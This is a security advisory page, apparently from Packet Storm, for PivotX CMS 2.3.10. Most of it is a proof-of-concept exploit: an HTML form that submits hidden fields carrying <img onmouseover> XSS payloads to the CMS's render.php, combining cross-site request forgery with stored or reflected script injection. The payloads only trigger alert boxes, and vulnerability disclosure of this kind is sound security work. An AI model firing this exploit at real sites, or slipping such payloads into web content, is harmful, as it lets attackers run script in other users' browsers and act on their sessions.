PivotX CMS version 2.3.10 suffers from cross site request forgery and cross site scripting vulnerabilities.
e1c1089223f4dd178980e8fdafd9c94f706acb389ba257a206a517387c37ecf5<!--
=====================================================
# PivotX CMS 2.3.10 - Csrf-Xss
=====================================================
# Vendor Homepage: www.mihalism.net
# Date: 10/02/2016
# Software Link : http://pivotx.net/files/pivotx_latest.zip
# Version : 2.3.10
# Author: Ashiyane Digital Security Team
# Contact: hehsan979@gmail.com
# Source: http://ehsansec.ir/advisories/pivotx-xss-xsrf.txt
=====================================================
Exploit :
!-->
<form action="http://localhost/pv/pivotx/render.php?previewpage=true"
method="post">
<input type='hidden' name='title' value="</title><img src=x
onmouseover='alert(1)'><a>">
<input type='hidden' name='subtitle' value="<img src=x onmouseover='alert(2)'>">
<input type='hidden' name='introduction' value="<img src=x
onmouseover='alert(3)'>">
<input type='hidden' name='body' value="<img src=x onmouseover='alert(4)'>">
<input type='hidden' name='author' value="<img src=x onmouseover='alert(5)'>">
<input type="submit" value="Attack">
</form>
<!--
================================================================================
# Discovered By : Ehsan Hosseini (EhsanSec.ir)
================================================================================
-->
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed